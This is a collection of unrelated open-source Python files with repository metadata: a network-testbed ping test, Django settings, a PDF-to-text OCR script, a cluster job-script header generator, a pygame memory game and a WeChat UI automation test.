i==21:x=-0.5*(1-c)*s\n if i==22:x=np.sqrt(3/8)*s**2\n if i==23:x=-0.5*(1+c)*s\n if i==24:x=0.25*(1+c)**2\n out.append(x)\n \n if m is None or mp is None:\n return np.array(out)\n else:\n return out[0]\n","repo_name":"alsinmr/pyDIFRATE","sub_path":"chimera/unused/vis3D.py","file_name":"vis3D.py","file_ext":"py","file_size_in_byte":24508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11932241720","text":"from nepi.execution.resource import ResourceFactory, ResourceManager, ResourceAction, ResourceState\nfrom nepi.execution.ec import ExperimentController\n\nfrom nepi.resources.omf.node import OMFNode\nfrom nepi.resources.omf.application import OMFApplication\nfrom nepi.resources.omf.interface import OMFWifiInterface\nfrom nepi.resources.omf.channel import OMFChannel\nfrom nepi.resources.omf.omf_api_factory import OMFAPIFactory\n\nfrom nepi.util.timefuncs import *\n\nimport os\nimport time\nimport unittest\n\nclass OMFPingNormalCase(unittest.TestCase):\n def test_deploy(self):\n ec = ExperimentController(exp_id = \"5421\" )\n\n self.node1 = ec.register_resource(\"omf::Node\")\n ec.set(self.node1, 'hostname', 'wlab12')\n ec.set(self.node1, 'xmppUser', \"nepi\")\n ec.set(self.node1, 'xmppServer', \"xmpp-plexus.onelab.eu\")\n ec.set(self.node1, 'xmppPort', \"5222\")\n ec.set(self.node1, 'xmppPassword', \"1234\")\n \n self.iface1 = ec.register_resource(\"omf::WifiInterface\")\n ec.set(self.iface1, 'name', \"wlan0\")\n ec.set(self.iface1, 'mode', \"adhoc\")\n ec.set(self.iface1, 'hw_mode', \"g\")\n ec.set(self.iface1, 'essid', \"vlcexp\")\n ec.set(self.iface1, 'ip', \"10.0.0.17/24\")\n \n self.channel = ec.register_resource(\"omf::Channel\")\n ec.set(self.channel, 'channel', \"6\")\n ec.set(self.channel, 'xmppUser', \"nepi\")\n ec.set(self.channel, 'xmppServer', \"xmpp-plexus.onelab.eu\")\n ec.set(self.channel, 'xmppPort', \"5222\")\n ec.set(self.channel, 'xmppPassword', \"1234\")\n \n self.app1 = ec.register_resource(\"omf::Application\")\n ec.set(self.app1, 'appid', 'Vlc#1')\n ec.set(self.app1, 'command', \"ping -c5 10.0.0.17\")\n\n ec.register_connection(self.app1, self.node1)\n ec.register_connection(self.node1, self.iface1)\n 
ec.register_connection(self.iface1, self.channel)\n\n ec.register_condition(self.app1, ResourceAction.STOP, self.app1, ResourceState.STARTED , \"10s\")\n\n ec.deploy()\n\n ec.wait_finished(self.app1)\n\n stdout_1 = ec.trace(self.app1, \"stdout\")\n stderr_1 = ec.trace(self.app1, \"stderr\")\n\n if stdout_1:\n f = open(\"app1_out.txt\", \"w\")\n f.write(stdout_1)\n f.close()\n\n if stderr_1:\n f = open(\"app1_err.txt\", \"w\")\n f.write(stderr_1)\n f.close()\n\n self.assertEquals(ec.get_resource(self.node1).state, ResourceState.STARTED)\n self.assertEquals(ec.get_resource(self.iface1).state, ResourceState.STARTED)\n self.assertEquals(ec.get_resource(self.channel).state, ResourceState.STARTED)\n self.assertEquals(ec.get_resource(self.app1).state, ResourceState.STOPPED)\n\n ec.shutdown()\n\n self.assertEquals(ec.get_resource(self.node1).state, ResourceState.RELEASED)\n self.assertEquals(ec.get_resource(self.iface1).state, ResourceState.RELEASED)\n self.assertEquals(ec.get_resource(self.channel).state, ResourceState.RELEASED)\n self.assertEquals(ec.get_resource(self.app1).state, ResourceState.RELEASED)\n\n t = open(\"app1_out.txt\", \"r\")\n l = t.readlines()\n self.assertEquals(l[0], \"PING 10.0.0.17 (10.0.0.17) 56(84) bytes of data.\\n\")\n self.assertIn(\"5 packets transmitted, 5 received, 0% packet loss, time\", l[-2])\n self.assertIn(\"rtt min/avg/max/mdev = \", l[-1])\n \n t.close()\n os.remove(\"app1_out.txt\")\n \n\n\nif __name__ == '__main__':\n unittest.main()\n\n\n\n","repo_name":"phiros/nepi","sub_path":"test/resources/omf/omf6_vlc_traces.py","file_name":"omf6_vlc_traces.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25491348188","text":"# Django settings for guardhouse project.\n\nfrom os import path\nSITE_ROOT = path.dirname(path.realpath(__file__))\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n ('Ulrich Petri', 'guardhouse@ulo.pe'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'guardhouse',\n 'USER': 'httpd',\n 'PASSWORD': '',\n 'HOST': '',\n 'PORT': '',\n }\n}\n\nCACHES = {\n 'default': {\n 'BACKEND': 'redis_cache.RedisCache',\n 'LOCATION': 'localhost:6379',\n },\n}\n\n# Celery\nBROKER_BACKEND = \"redis\"\nBROKER_HOST = \"localhost\"\nBROKER_PORT = 6379\nBROKER_VHOST = \"0\"\nCELERY_RESULT_BACKEND = \"redis\"\nREDIS_HOST = \"localhost\"\nREDIS_PORT = 6379\n\n\nTIME_ZONE = 'Europe/Berlin'\n\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nMEDIA_ROOT = path.join(SITE_ROOT, \"media\")\n\nMEDIA_URL = '/media/'\n\nSTATIC_ROOT = path.join(SITE_ROOT, \"static\")\n\nSTATIC_URL = '/static/'\n\nADMIN_MEDIA_PREFIX = '/static/admin/'\n\nLOGIN_URL = '/auth/login/'\nLOGIN_REDIRECT_URL = '/dashboard/'\nLOGIN_ERROR_URL = '/auth/loginerror/'\n\nSTATICFILES_DIRS = (\n path.join(SITE_ROOT, \"web\"),\n)\n\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n 'compressor.finders.CompressorFinder',\n)\n\ntry:\n # load secret key from file to keep it out of vcs\n with open(path.join(SITE_ROOT, \".secret\"), \"r\") as secret:\n SECRET_KEY = secret.read()\nexcept IOError:\n from django.core.exceptions import ImproperlyConfigured\n raise ImproperlyConfigured(\n \"You need to place a secret key in a file called '.secret' in the \"\n \"project root.\\nFor example:\\n\\t$ ./manage.py 
generate_secret_key > .secret\"\n    )\n\nfrom django.template.defaultfilters import slugify\nSOCIAL_AUTH_USERNAME_FIXER = lambda u: slugify(u)\n\nTEMPLATE_LOADERS = (\n    'django.template.loaders.filesystem.Loader',\n    'django.template.loaders.app_directories.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n    'django.middleware.common.CommonMiddleware',\n    'django.contrib.sessions.middleware.SessionMiddleware',\n    'django.middleware.csrf.CsrfViewMiddleware',\n    'django.contrib.auth.middleware.AuthenticationMiddleware',\n    'django.contrib.messages.middleware.MessageMiddleware',\n    'main.middleware.HasAccountMiddleware',\n    'main.middleware.SiteVerificationCompletionMiddleware',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n    \"django.contrib.auth.context_processors.auth\",\n    \"django.core.context_processors.debug\",\n    \"django.core.context_processors.i18n\",\n    \"django.core.context_processors.media\",\n    \"django.core.context_processors.static\",\n    \"django.contrib.messages.context_processors.messages\",\n    \"main.context_processors.google_analytics\",\n)\n\nSESSION_ENGINE = \"redis_sessions.backends.redis\"\n\nROOT_URLCONF = 'guardhouse.urls'\n\nTEMPLATE_DIRS = (\n    path.join(SITE_ROOT, \"templates\"),\n)\n\nAUTHENTICATION_BACKENDS = (\n    'social_auth.backends.twitter.TwitterBackend',\n    'social_auth.backends.google.GoogleBackend',\n    'social_auth.backends.OpenIDBackend',\n    'django.contrib.auth.backends.ModelBackend',\n)\n\nINSTALLED_APPS = (\n    'django.contrib.auth',\n    'django.contrib.contenttypes',\n    'django.contrib.sessions',\n    'django.contrib.sites',\n    'django.contrib.messages',\n    'django.contrib.staticfiles',\n    'django.contrib.admin',\n    'django_extensions',\n    'compressor',\n    'south',\n    'sentry',\n    'sentry.client',\n    'social_auth',\n    'djcelery',\n\n    'content',\n    'main',\n    'sentry_wrap',\n)\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n    'version': 1,\n    'disable_existing_loggers': False,\n    'formatters': {\n        'default': {\n            'format': '%(levelname)s %(name)s(%(lineno)d): %(message)s',\n        }\n    },\n    'handlers': {\n        'mail_admins': {\n            'level': 'ERROR',\n            'class': 'django.utils.log.AdminEmailHandler'\n        },\n        'console':{\n            'level':'DEBUG',\n            'class':'logging.StreamHandler',\n            'formatter': 'default'\n        },\n    },\n    'loggers': {\n        'django.request': {\n            'handlers': ['mail_admins'],\n            'level': 'ERROR',\n            'propagate': True,\n        },\n        'south': {\n            'level': 'INFO',\n            'propagate': False,\n        },\n        '': {\n            'handlers': ['console'],\n            'level': 'DEBUG',\n        },\n    }\n}\n\ntry:\n    from local_settings import *\nexcept ImportError:\n    pass\n\nimport djcelery\ndjcelery.setup_loader()\n","repo_name":"ulope/guardhouse","sub_path":"guardhouse/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"27326514536","text":"\"\"\" Implement a function that takes two numbers (positional arguments) and\nperforms their division. Request the numbers from the user and handle\nthe division-by-zero case.\"\"\"\n# Corrected assignment\n\ndef function_inter():\n    while True:\n        try:\n            x = float(input())\n        except ValueError:\n            print(\"Error! 
That is not a number, try again.\")\n        else:\n            return x\ndef division(n1,n2):\n    return n1 / n2\n\nprint('Enter the dividend: ')\nnamber_1 = function_inter()\nnamber_2 = 0\nwhile namber_2 == 0:\n    print('Enter the divisor: ')\n    namber_2 = function_inter()\n    if namber_2 == 0:\n        print('Division by zero is not allowed!')\nprint(\n    f'The result of dividing {namber_1} by {namber_2} is: '\n    f'{division(namber_1, namber_2)}')","repo_name":"RuslanSemenchenko1974/Seminar_4_HomeTask","sub_path":"4/Seminar_3_Task1.py","file_name":"Seminar_3_Task1.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9035867543","text":"# Use Python to turn an image-only PDF into a text PDF: https://www.jb51.net/article/160621.htm\r\n\r\nimport os\r\nimport ghostscript\r\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\r\nfrom PythonMagick import Image\r\nfrom aip import AipOcr\r\nimport pdfkit\r\n\r\npath='??'\r\npdfname='??'\r\nDPI='85'\r\nAPP_ID='??'\r\nAPI_KEY='??'\r\nSECRET_KEY='??'\r\npath_wk=r'path to the wkhtmltopdf installation'\r\npdfkit_config=pdfkit.configuration(wkhtmltopdf=path_wk)\r\npdfkit_options={'encoding':'UTF-8',}\r\n\r\nos.chdir(path)\r\npdf_input=PdfFileReader(open(pdfname, 'rb'))\r\npage_count=pdf_input.getNumPages()\r\npage_range=range(page_count)\r\n\r\nfor page_num in page_range:\r\n\tim=Image()\r\n\tim.density(DPI)\r\n\tim.read(pdfname + '[' + str(page_num) +']')\r\n\tim.write(str(page_num)+ '.jpg')\r\n\r\nclient=AipOcr(APP_ID, API_KEY, SECRET_KEY)\r\ndef get_file_content(filePath):\r\n\twith open(filePath, 'rb') as fp:\r\n\t\treturn fp.read()\r\n\r\noptions={}\r\noptions[\"language_type\"]=\"CHN_ENG\"\r\noptions[\"detect_direction\"]=\"false\"\r\noptions[\"detect_language\"]=\"false\"\r\noptions[\"probability\"]=\"false\"\r\nallteststr=[]\r\nfor page_num in page_range:\r\n\timage=get_file_content(r'%s\\%s.jpg' % (path, page_num))\r\n\ttestjson=client.basicGeneral(image, options)\r\n\tteststr=''\r\n\tfor x in testjson['words_result']:\r\n\t\tteststr=teststr+x['words']+'
'\r\n\tallteststr.append(teststr)\r\n\r\nfor page_num in page_range:\r\n\tpdfkit.from_string((allteststr[page_num]), '%s.pdf' % (str(page_num)),configuration=pdfkit_config, options=pdfkit_options)\r\n\r\npdf_output=PdfFileWriter()\r\nfor page_num in page_range:\r\n\tos.chdir(path)\r\n\tpdf_input=PdfFileReader(open('%s.pdf' % (str(page_num)), 'rb'))\r\n\tpage=pdf_input.getPage(0)\r\n\tpdf_output.addPage(page)\r\npdf_output.write(open('newpdf.pdf', 'wb'))","repo_name":"hansvng/private_repository","sub_path":"transform_pdf_pic2word.py","file_name":"transform_pdf_pic2word.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6772130456","text":"#!/usr/bin/env python\r\n# -*- coding:utf-8 -*-\r\n\r\nfrom __future__ import print_function\r\n\r\nimport argparse\r\nimport os\r\nimport os.path as op\r\nimport logging\r\nimport sys\r\n\r\nfrom multiprocessing import Pool, Process, cpu_count\r\nfrom TDGP.apps.base import debug, listify, ActionDispatcher\r\n\r\n\r\ndebug()\r\n\r\ndef main():\r\n\r\n    actions = (\r\n        (\"clusterHeader\", \"print header of cluster system\"),\r\n    )\r\n    p = ActionDispatcher(actions)\r\n    p.dispatch(globals())\r\n\r\n\r\nclass Jobs(object):\r\n    def __init__(self):\r\n        pass\r\n\r\nclass Parallel(object):\r\n    \"\"\"\r\n    Run commands in parallel.\r\n    \"\"\"\r\n    def __init__(self, target, args, threads=cpu_count()):\r\n        self.target = target\r\n        self.args = args\r\n        self.threads = min(len(args), threads)\r\n\r\n    def run(self):\r\n        p = Pool(self.threads)\r\n        res = p.map(self.target, self.args)\r\n        return res\r\n\r\n\r\ndef parallel(target, args, threads=cpu_count()):\r\n    p = Pool(min(len(args), threads))\r\n    res = p.map(target, args)\r\n    return res\r\n\r\n\r\n\r\nclass CMD(object):\r\n    \"\"\"\r\n    Linux command execute object\r\n\r\n    Params:\r\n    -------\r\n    cmds: `list` command list\r\n    threads: `int` number of thread\r\n\r\n    Examples:\r\n    ---------\r\n    >>> cmds = ['sort file > sorted.file', 'sort file2 > sorted.file2']\r\n    >>> CMD(cmds)\r\n    \"\"\"\r\n\r\n    def __init__(self, cmds, threads=4):\r\n\r\n        self.cmds = listify(cmds)\r\n        self.threads = threads\r\n        self.run()\r\n    \r\n    def run(self):\r\n        p = Parallel(os.system, self.cmds, self.threads)\r\n        p.run()\r\n\r\n\r\n\r\nPBS_HEADER = \"\"\"#!/bin/bash\r\n#PBS -j oe {}\r\n#PBS -q {}\r\n#PBS -V \r\n#PBS -l nodes=1:ppn={} {}\r\n{}\r\nif [[ ! 
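The `Parallel` helper in the grid.py record above fans one picklable callable out over a list of arguments via `multiprocessing.Pool.map`. A minimal, runnable illustration of the same pattern (plain stdlib, not importing TDGP):

```python
from multiprocessing import Pool

def square(x):            # must be a top-level (picklable) function
    return x * x

if __name__ == "__main__":
    with Pool(2) as pool:
        print(pool.map(square, [1, 2, 3]))  # [1, 4, 9]
```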
-z $PBS_O_WORKDIR ]]; then\r\n cd $PBS_O_WORKDIR\r\nfi\r\n\"\"\"\r\n\r\nSLURM_HEADER = \"\"\"#!/bin/bash {}\r\n#SBATCH --nodes=1 {}\r\n#SBATCH --ntasks-per-node={}\r\n#SBATCH --partition={}\r\n{}\r\nCURDIR=`pwd`\r\n\"\"\"\r\n\r\n\r\nSGE_HEADER = \"\"\"#!/bin/bash\r\n#$ -j y\r\n#$ -S /bin/bash\r\n#$ -cwd {}\r\n#$ -q {}\r\n#$ -pe mpi {} {}\r\n\"\"\"\r\nclass Cluster(object):\r\n \"\"\"\r\n Helper class for cluster (job scheduler) operations.\r\n To work correctly, the `CLUSTER` environment variable should be set\r\n to the scheduler in use (SGE, PBS, TORQUE or SLURM).\r\n Params:\r\n --------\r\n \r\n Returns:\r\n ---------\r\n out: `str`: CLUSTER\r\n\r\n Functions:\r\n ---------\r\n get_header: get the job-script header of the cluster system, with parameters filled in\r\n get_raw_header: get the raw (unformatted) header template of the cluster system\r\n\r\n \"\"\"\r\n \r\n def __init__(self, cluster=None, \r\n name=None, queue=None, \r\n threads=1, array=None,\r\n memory=None):\r\n self.CLUSTER = cluster if cluster else None\r\n if not self.CLUSTER:\r\n self.get()\r\n self.get_header(name, queue, threads, array, memory)\r\n self.get_raw_header()\r\n\r\n def get(self):\r\n \"\"\"\r\n Obtain the scheduler name from the `CLUSTER` environment variable;\r\n if it is not set, fall back to the default `SLURM`.\r\n \"\"\"\r\n try:\r\n self.CLUSTER = os.environ['CLUSTER']\r\n except KeyError:\r\n self.CLUSTER = 'SLURM'\r\n logging.warning('Environment variable `CLUSTER` is not set; defaulting to SLURM')\r\n\r\n return self.CLUSTER\r\n\r\n\r\n def get_header(self, name=None, queue=None, \r\n threads=1, array=None,\r\n memory=None):\r\n \"\"\"\r\n Return a job-script header for the scheduler named in `CLUSTER`.\r\n \"\"\"\r\n if self.CLUSTER.upper() == \"SGE\":\r\n name = \"\\n#$ -N \" + name if name else \"\"\r\n queue = queue if queue else \"all.q\"\r\n array = \"\\n#$ -t \" + array if array else \"\"\r\n mem = \"#$ -l mem_free={}\".format(memory) if memory else \"\"\r\n self.header = SGE_HEADER.format(name, queue, threads, array) \r\n self.header += mem\r\n elif self.CLUSTER.upper() == \"PBS\":\r\n name = \"\\n#PBS -N \" + name if name else \"\"\r\n queue = queue if queue else \"workq\"\r\n array = \"\\n#PBS -J \" + array if array else \"\"\r\n mem = \"#PBS -l mem={}\".format(memory) if memory else \"\"\r\n self.header = PBS_HEADER.format(name, queue, threads, array, mem)\r\n elif self.CLUSTER.upper() == \"TORQUE\":\r\n name = \"\\n#PBS -N \" + name if name else \"\"\r\n queue = queue if queue else \"share\"\r\n array = \"\\n#PBS -J \" + array if array else \"\"\r\n mem = \"#PBS -l mem={}\".format(memory) if memory else \"\"\r\n self.header = PBS_HEADER.format(name, queue, threads, array, mem)\r\n elif self.CLUSTER.upper() == 'SLURM':\r\n queue = queue if queue else \"low\"\r\n name = \"\\n#SBATCH --job-name={}\".format(name) if name else \"\"\r\n array = \"\\n#SBATCH --array=\" + array if array else \"\"\r\n mem = \"\\n#SBATCH --mem={}\".format(memory) if memory else \"\"\r\n self.header = SLURM_HEADER.format(name, mem, threads, queue, array)\r\n else:\r\n logging.warning(\"there is no header template \"\r\n \"for cluster:`{}`\".format(self.CLUSTER))\r\n sys.exit()\r\n return self.header\r\n\r\n def get_raw_header(self):\r\n \"\"\"\r\n Return the raw (unformatted) header template for the scheduler\r\n named in `CLUSTER`.\r\n \"\"\"\r\n if self.CLUSTER.upper() == \"SGE\":\r\n self.raw_header = SGE_HEADER\r\n elif self.CLUSTER.upper() == \"PBS\":\r\n self.raw_header = PBS_HEADER\r\n elif self.CLUSTER.upper() == \"TORQUE\":\r\n self.raw_header = PBS_HEADER\r\n elif self.CLUSTER.upper() == \"SLURM\":\r\n self.raw_header = SLURM_HEADER\r\n else:\r\n 
logging.warning(\"there is not of header \"\r\n \"of cluster:`{}`\".format(self.CLUSTER))\r\n sys.exit()\r\n return self.raw_header\r\n\r\n\r\n def __str__(self):\r\n return self.CLUSTER\r\n\r\n __retr__ = __str__\r\n \r\n### out command ###\r\ndef clusterHeader(args):\r\n \"\"\"\r\n %(prog)s \r\n print the header of clustes\r\n \"\"\" \r\n p = argparse.ArgumentParser(prog=clusterHeader.__name__,\r\n description=clusterHeader.__doc__,\r\n conflict_handler='resolve')\r\n pReq = p.add_argument_group('Required arguments')\r\n pOpt = p.add_argument_group('Optional arguments')\r\n pOpt.add_argument('-s', '--command', default=\"\",\r\n help='command of scripts [default: %(default)s]')\r\n pOpt.add_argument('-c', '--cluster', default=None, \r\n help='cluster system [default: auto]')\r\n pOpt.add_argument('-n', '--name', default=None,\r\n help='name of jobs in cluster [default: jobs name]')\r\n pOpt.add_argument('-q', '--queue', default=None, \r\n help='queue of cluster [default: auto]')\r\n pOpt.add_argument('-t', '--threads', default=1, type=int,\r\n help='threads number of program [default: %(default)s]')\r\n pOpt.add_argument('-m', '--memory', default=None,\r\n help='memory of program [default: %(default)s]')\r\n pOpt.add_argument('-a', '--array', default=None, \r\n help='array jobs [default: %(default)s]')\r\n pOpt.add_argument('-h', '--help', action='help',\r\n help='show help message and exit.')\r\n \r\n args = p.parse_args(args)\r\n cluster = Cluster(args.cluster, args.name, \r\n args.queue, args.threads,\r\n args.array, args.memory)\r\n print(cluster.header, file=sys.stdout)\r\n print(args.command, file=sys.stdout)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"wangyibin/TDGP","sub_path":"apps/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":7555,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"7203767727","text":"import pygame as pg\nimport sys\nimport random\nfrom pygame.locals import Rect\n\nGRID_SIZE = 4\t# Number of cells across row/column\nN_PIXELS = 100\t# Number of pixels in one cell across row/column\nN_SHAPES = 4\t# Number of shapes used in the game\nN_OCC = int((GRID_SIZE*GRID_SIZE)/N_SHAPES)\t# Number of occurences of a shape\ncells = [x for x in range(1,GRID_SIZE*GRID_SIZE+1)]\ncellObjects = []\nshapesarrangement = []\n\ndef drawBackground():\n\tfor i in range(GRID_SIZE):\n\t\tfor j in range(GRID_SIZE):\n\t\t\tcol = int(j)*N_PIXELS\n\t\t\trow = int(i)*N_PIXELS\n\t\t\trect_obj = Rect(col,row,N_PIXELS,N_PIXELS)\n\t\t\tcellObjects.append(rect_obj)\n\t\t\tpg.draw.rect(Window,(96,128,64),rect_obj,2)\n\ndef drawRecShape(x,color):\n\trow = int((x-1)/GRID_SIZE)*N_PIXELS\n\tcol = int((x-1)%GRID_SIZE)*N_PIXELS\n\tpg.draw.rect(Window, color, Rect(col+20,row+20,60,60))\n\ndef drawCirShape(x,color):\n\trow = int((x-1)/GRID_SIZE)*N_PIXELS\n\tcol = int((x-1)%GRID_SIZE)*N_PIXELS\n\tpg.draw.circle(Window, color, (col+50, row+50),30)\n\ndef drawTriShape(x,color):\n\trow = int((x-1)/GRID_SIZE)*N_PIXELS\n\tcol = int((x-1)%GRID_SIZE)*N_PIXELS\n\tpg.draw.polygon(Window,color,((col+10,row+20),(col+90,row+20),(col+50,row+80)))\n\ndef drawDiamondShape(x,color):\n\trow = int((x-1)/GRID_SIZE)*N_PIXELS\n\tcol = int((x-1)%GRID_SIZE)*N_PIXELS\n\tpg.draw.polygon(Window,color,((col+10,row+50),(col+50,row+20),(col+90,row+50),(col+50,row+80)))\n\ndef startGame():\n\tfor i in range(N_OCC):\n\t\tif i is 0 or i is 1: color = (0,0,255)\n\t\telse: color = (0,255,0)\n\t\tx = 
random.choice(cells)\n\t\tshapesarrangement.append(x)\n\t\tdrawRecShape(x,color)\n\t\tcells.remove(x)\n\tfor i in range(N_OCC):\n\t\tif i == 0 or i == 1: color = (255,255,0)\n\t\telse: color = (0,255,255)\n\t\tx = random.choice(cells)\n\t\tshapesarrangement.append(x)\n\t\tdrawCirShape(x,color)\n\t\tcells.remove(x)\n\tfor i in range(N_OCC):\n\t\tif i == 0 or i == 1: color = (255,0,255)\n\t\telse: color = (128,0,0)\n\t\tx = random.choice(cells)\n\t\tshapesarrangement.append(x)\n\t\tdrawTriShape(x,color)\n\t\tcells.remove(x)\n\tfor i in range(N_OCC):\n\t\tif i == 0 or i == 1: color = (128,128,0)\n\t\telse: color = (128,0,128)\n\t\tx = random.choice(cells)\n\t\tshapesarrangement.append(x)\n\t\tdrawDiamondShape(x,color)\n\t\tcells.remove(x)\n\ndef shapeIndex(mouse_pos):\n\tfor i in range(GRID_SIZE*GRID_SIZE):\n\t\tif cellObjects[i].collidepoint(mouse_pos):\n\t\t\treturn shapesarrangement.index(i+1)\n\ndef cellNo(mouse_pos):\n\tfor i in range(GRID_SIZE*GRID_SIZE):\n\t\tif cellObjects[i].collidepoint(mouse_pos):\n\t\t\treturn i+1\n\ndef rightchoice(firstchoice, secondchoice):\n\tx = shapeIndex(firstchoice)\n\ty = shapeIndex(secondchoice)\n\tfor i in range(0,16,2):\n\t\tj = i+1\n\t\tif ((x == i and y == j) or (x == j and y == i)):\n\t\t\treturn True\n\treturn False\n\ndef hide(mouse_pos):\n\tcell_num = cellNo(mouse_pos)\n\tfor i in range(GRID_SIZE*GRID_SIZE):\n\t\tif cell_num == i+1:\n\t\t\tpg.draw.rect(Window,(255,255,255),cellObjects[i].inflate(-10,-10))\n\ndef show(mouse_pos):\n\tcell_num = cellNo(mouse_pos)\n\tshapeindex = shapeIndex(mouse_pos)\n\tif shapeindex == 0 or shapeindex == 1:\n\t\tcolor = (0,0,255)\n\t\tdrawRecShape(cell_num, color)\n\telif shapeindex == 2 or shapeindex == 3:\n\t\tcolor = (0,255,0)\n\t\tdrawRecShape(cell_num, color)\n\telif shapeindex == 4 or shapeindex == 5:\n\t\tcolor = (255,255,0)\n\t\tdrawCirShape(cell_num, color)\n\telif shapeindex == 6 or shapeindex == 7:\n\t\tcolor = (0,255,255)\n\t\tdrawCirShape(cell_num, color)\n\telif shapeindex == 8 or shapeindex == 9:\n\t\tcolor = (255,0,255)\n\t\tdrawTriShape(cell_num, color)\n\telif shapeindex == 10 or shapeindex == 11:\n\t\tcolor = (128,0,0)\n\t\tdrawTriShape(cell_num, color)\n\telif shapeindex == 12 or shapeindex == 13:\n\t\tcolor = (128,128,0)\n\t\tdrawDiamondShape(cell_num, color)\n\telif shapeindex == 14 or shapeindex == 15:\n\t\tcolor = (128,0,128)\n\t\tdrawDiamondShape(cell_num, color)\n\ndef main():\n\tpg.init()\n\tglobal Window\n\tWindow = pg.display.set_mode((GRID_SIZE*N_PIXELS, GRID_SIZE*N_PIXELS))\n\tWindow.fill((255,255,255))\n\tpg.display.set_caption('Memory Game')\n\n\tdrawBackground()\n\tstartGame()\n\tpg.display.update()\n\n\tpg.time.wait(3000)\n\tWindow.fill((255,255,255))\n\tdrawBackground()\n\tpg.display.update()\n\n\tflag = 0\n\ttruechoices = []\n\n\twhile True:\n\t\tfor event in pg.event.get():\n\t\t\tif event.type == pg.QUIT:\n\t\t\t\tpg.quit()\n\t\t\t\tsys.exit()\n\t\t\telif event.type==pg.MOUSEBUTTONUP:\n\t\t\t\tmouse_pos = pg.mouse.get_pos()\n\t\t\t\tshow(mouse_pos)\n\t\t\t\tpg.display.update()\n\t\t\t\tif flag == 0:\n\t\t\t\t\tfirstchoice = mouse_pos\n\t\t\t\t\tif cellNo(firstchoice) in truechoices: flag = 0\n\t\t\t\t\telse: flag = 1\n\t\t\t\telse:\n\t\t\t\t\tsecondchoice = mouse_pos\n\t\t\t\t\tif cellNo(secondchoice) in truechoices: flag = 1\n\t\t\t\t\telse: flag = 0\n\t\t\t\t\tif not (cellNo(firstchoice) in truechoices) and not (cellNo(secondchoice) in truechoices):\n\t\t\t\t\t\tif rightchoice(firstchoice, 
secondchoice):\n\t\t\t\t\t\t\ttruechoices.append(cellNo(firstchoice))\n\t\t\t\t\t\t\ttruechoices.append(cellNo(secondchoice))\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tpg.time.wait(1)\n\t\t\t\t\t\t\thide(firstchoice)\n\t\t\t\t\t\t\thide(secondchoice)\n\t\t\t\t\t\t\tpg.display.update()\n\n\t\t\tif len(truechoices) == GRID_SIZE*GRID_SIZE:\n\t\t\t\timage = pg.image.load('./winner-winner-boom-boom.png')\n\t\t\t\timage = pg.transform.scale(image, (GRID_SIZE*N_PIXELS+10,GRID_SIZE*N_PIXELS+10))\n\t\t\t\tWindow.blit(image, (0,0))\n\t\t\t\tFont1 = pg.font.SysFont('arial',32,True,True)\n\t\t\t\ttextsurface = Font1.render('Winner Winner Boom Boom!!!', True, (0,0,0))\n\t\t\t\tWindow.blit(textsurface, (N_PIXELS-80,N_PIXELS+50))\n\t\t\t\tpg.display.update()\n\nif __name__ == '__main__':\n\tmain()","repo_name":"pranshuag9/Memory-Game-Using-PyGame","sub_path":"game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":5293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70647828036","text":"#!/usr/bin/env python\n# coding=utf-8\n# author: ijumper\n\nimport pytest\n\nfrom airtest.core.api import *\nfrom libs.pages.page import *\nfrom libs.utils.path import *\nfrom libs.const.app import *\nfrom libs.business.chats import *\n\n\ndef setup_function():\n # Automatically initialize the device\n auto_setup(__file__)\n stop_app(wechat_package)\n\n\ndef teardown_function():\n stop_app(wechat_package)\n\n\ndef test_send_msg():\n start_app(wechat_package, activity=None)\n\n chats_page.btn_open.wait_for_appearance()\n if chats_page.btn_open.exists():\n print(\"start wechat succeeded.\")\n else:\n print(\"start wechat failed, quitting.\")\n return\n for i in range(5):\n send_msg_to(\"旺福\", \"你好\")\n","repo_name":"jumper2014/fast-test","sub_path":"test-framework-pytest-airtest-demo/suites/send/test_send_msg.py","file_name":"test_send_msg.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":131,"dataset":"github-code","pt":"61"}
